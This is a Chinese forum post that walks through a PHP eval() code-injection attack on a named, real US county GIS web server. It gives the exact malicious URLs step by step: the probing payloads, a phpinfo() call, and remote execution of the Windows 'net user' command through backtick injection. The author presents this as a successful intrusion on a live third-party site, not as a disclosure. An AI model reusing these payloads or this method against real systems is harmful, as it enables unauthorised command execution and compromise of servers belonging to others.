设为首页 收藏本站
查看: 1122|回复: 0

[经验分享] PHP Code Injection-note.txt-运维网 博客

[复制链接]

尚未签到

发表于 2018-12-24 08:55:12 | 显示全部楼层 |阅读模式
  作者:2
  2月发现的漏洞,并负责测试与技术解释。由菲负责做文档记录。
  开始测试…………
  “http://cpd.alachua.fl.us/gis/reports/output.php?id=ImpactFeesReport&month=all&year=all&fee_type=trans1&fee_status=reversed”
  上面链接是一个Code Injection注入连接,形成的原理是变量没有经过过滤就放入了eval()函数中执行造成的,eval是可以执行php代码的 一句话就是用的这个函数,把id被我改成了一个xox访问显示如图1
  “Class ‘xox’ not found ”这个信息暴露了eval里面的代码在执行一个类 “Class” php中调用类那么就是为了使用类中的函数,那我们使用php的种种特殊字符来测试下。
  php特点;分号,分号是一句的结束,如果把注入点构造成
  “http://cpd.alachua.fl.us/gis/reports/output.php?id=ImpactFeesReport;&month=all&year=all&fee_type=trans1&fee_status=reversed”
  注意加了“;“如果是调用ImpactFeesReport这个函数那么必然会扰乱函数代码 导致该句提前结束执行结果如图
  果然 我得到了不一样的错误信息
  “Missing argument 1 for ImpactFeesReport::ImpactFeesReport()“这里一目了然程序调用了ImactFeesReport里面的初始化代码,
  他提示“Missing argument“解释下其实是要执行ImpactFeesReport(),但是后面的括号被参数截断了所以没有了参数,
  现在继续 php这代码注释“//“执行
  “http://cpd.alachua.fl.us/gis/reports/output.php?id=ImpactFeesReport//&month=all&year=all&fee_type=trans1&fee_status=reversed“
  执行结果如图
  错误信息“syntax error, unexpected $end ” 意思是不正确的结束 ,“eval()d code on line 1”这句意思是函数丢失了一个参数说明函数至少有一个参数我们给这个函数用0作为参数,然后执行
  http://cpd.alachua.fl.us/gis/reports/output.php?id=ImpactFeesReport(0);//&month=all&year=all&fee_type=trans1&fee_status=reversed
  执行结果如图
  发现错误提示少了一些,只是出现“Call to a member function select() on a non-object”
  那么说明什么?说明类函数那段代码执行成功了, 这是个细节 大家不信比较前几次就会发现,说一下php中类型php是弱类型语言php中  类型不分string int如果是字符型 他内部转换成string。既然用;//得逞了,那我们在试试“phpinfo()”执行
  “http://cpd.alachua.fl.us/gis/reports/output.php?id=ImpactFeesReport(0);phpinfo();//&month=all&year=all&fee_type=trans1&fee_status=reversed”
  结果如图
  和预想的一样爆出了信息,
  我们还可以执行系统命令,里面的代码会自动调用system()函数来执行 执行后的结果以字符串返回我们在连接上加“;echo`net%20use;//”用echo输出 在浏览器执行
  http://cpd.alachua.fl.us/gis/reports/output.php?id=ImpactFeesReport(0)   ;//;echo`net%20user`;//&month=all&year=all&fee_type=trans1&fee_status=reversed
  执行结果如图
  说过一下echo的作用,是用来输出一个或多个字符串,具体的语法为echo 要输出的字符
  在这我们用了输出 执行命令的结果,这就是测试过程就到这了,生活中细节决定成败,***的时候也是如此。。


运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-655096-1-1.html 上篇帖子: php中的编码转换 下篇帖子: PHP从零学习----5
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表